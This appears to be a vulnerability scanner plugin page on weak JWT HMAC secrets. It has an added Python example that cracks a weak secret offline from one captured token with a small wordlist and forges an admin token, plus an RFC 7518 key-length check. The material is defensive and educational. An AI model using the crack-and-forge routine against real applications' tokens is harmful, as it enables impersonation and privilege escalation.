JSON Web Token Weak Secret

High | Web Application Scanning | Plugin ID 112697




JSON Web Tokens (JWTs) can be signed to protect the claims they carry against tampering. Using either an asymmetric algorithm (RSA or ECDSA) or a symmetric one (HMAC), the application computes a signature over the encoded header and payload and verifies that signature when it decodes the token, so that a token whose content has been altered is rejected. With a symmetric algorithm (HS256, HS384 or HS512), the signature is an HMAC computed over the encoded header and payload with the corresponding SHA-2 hash function and a secret key known to the application.

A weak secret (short, low-entropy, or taken from a default, example or common-password list) can be recovered by brute force. The attack is entirely offline: a single captured token contains both the signing input and the HMAC tag, so an attacker can test candidate keys as fast as the hardware allows without sending a single request to the application. Once the secret is known, the attacker can sign arbitrary tokens on behalf of the application. Depending on what the token is used for, this allows forging valid tokens to impersonate other users or to gain further privileges.


The secret key used to sign the application's JSON Web Tokens must be long and generated from a cryptographically secure random source, so that it cannot be recovered by brute force; it must never be a password-style string. Note that the JSON Web Algorithms standard (RFC 7518, Section 3.2) requires the key to be at least as long as the output of the hash function used with the HMAC algorithm: 256 bits (32 bytes) for HS256, 384 bits for HS384 and 512 bits for HS512. A key of that length drawn from a CSPRNG is beyond brute-force reach.
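The following example, added here and not part of the plugin or of any library the page describes, shows the whole picture in standard-library Python: HS256 signing and verification, the offline dictionary attack that recovers a weak secret from one captured token and then forges an admin token, and the RFC 7518 length check with a CSPRNG-generated replacement key. The secret `b"secret"`, the claims, and the wordlist are constructed for the demonstration; the function names are the example's own.

```python
"""Added example: weak HMAC secret -> offline crack -> forged JWT.
Stdlib only; token, secret and wordlist are constructed for the demo."""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional

# HMAC algorithms from RFC 7518 section 3.2, mapped to their hash function.
HASH_FOR_ALG = {
    "HS256": hashlib.sha256,
    "HS384": hashlib.sha384,
    "HS512": hashlib.sha512,
}


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWS requires (RFC 7515 section 2)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: bytes, alg: str = "HS256") -> str:
    """Build a compact JWS: b64url(header).b64url(payload).b64url(HMAC tag)."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    )
    tag = hmac.new(secret, signing_input.encode("ascii"), HASH_FOR_ALG[alg]).digest()
    return signing_input + "." + b64url_encode(tag)


def verify_jwt(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the HMAC tag is valid for `secret`, else None.
    Only HS* algorithms are accepted, so an `alg: none` header is rejected."""
    try:
        header_b64, payload_b64, tag_b64 = token.split(".")
        digest = HASH_FOR_ALG[json.loads(b64url_decode(header_b64))["alg"]]
    except (ValueError, KeyError):
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), digest).digest()
    if not hmac.compare_digest(expected, b64url_decode(tag_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def crack_secret(token: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute the HMAC for each candidate key.
    Nothing is sent to the application; the captured token already carries
    both the signing input and the tag needed to check a guess."""
    header_b64, payload_b64, tag_b64 = token.split(".")
    digest = HASH_FOR_ALG[json.loads(b64url_decode(header_b64))["alg"]]
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    target = b64url_decode(tag_b64)
    for candidate in wordlist:
        if hmac.compare_digest(hmac.new(candidate, signing_input, digest).digest(), target):
            return candidate
    return None


def min_secret_bytes(alg: str) -> int:
    """RFC 7518 section 3.2: key at least as long as the hash output (32 bytes for HS256)."""
    return HASH_FOR_ALG[alg]().digest_size


def secret_meets_minimum(secret: bytes, alg: str) -> bool:
    return len(secret) >= min_secret_bytes(alg)


def generate_secret(alg: str = "HS256") -> bytes:
    """CSPRNG-generated key of the RFC 7518 minimum length for `alg`."""
    return secrets.token_bytes(min_secret_bytes(alg))


# Constructed inputs for the demonstration (not from any real application).
WEAK_SECRET = b"secret"
CLAIMS = {"sub": "alice", "role": "user"}
WORDLIST = [b"password", b"123456", b"changeme", b"secret", b"jwtsecret"]


def run_attack(secret: bytes):
    """Sign CLAIMS with `secret`, try to crack it from the token alone, and if
    that works forge an admin token. Returns (recovered_secret, forgery_accepted)."""
    token = sign_jwt(CLAIMS, secret)
    recovered = crack_secret(token, WORDLIST)
    if recovered is None:
        return None, False
    forged = sign_jwt({"sub": "alice", "role": "admin"}, recovered)
    accepted = verify_jwt(forged, secret)  # the real verifier accepts the forgery
    return recovered, accepted is not None and accepted["role"] == "admin"


if __name__ == "__main__":
    strong = generate_secret("HS256")
    print("weak secret:  ", run_attack(WEAK_SECRET))
    print("strong secret:", run_attack(strong))
    print("weak meets RFC 7518 minimum:  ", secret_meets_minimum(WEAK_SECRET, "HS256"))
    print("strong meets RFC 7518 minimum:", secret_meets_minimum(strong, "HS256"))
```

The wordlist here is five entries; a real attacker runs the same loop over password dictionaries with hashcat or john, and nothing in the loop touches the application, which is why rate limiting and lockouts do not help. The length check is only a floor: a 32-byte secret that is a human-chosen phrase still fails, because the attack searches the space of likely phrases, not of all 256-bit strings.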

Plugin Details

Severity: High

ID: 112697

Type: remote

Published: 2/11/2021

Updated: 9/7/2021

Scan Template: api, scan, pci

Risk Information


Risk Factor: High

Base Score: 7.8

Vector: AV:N/AC:L/Au:N/C:N/I:C/A:N

CVSS Score Source: Tenable


Risk Factor: High

Base Score: 7.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVSS Score Source: Tenable

Reference Information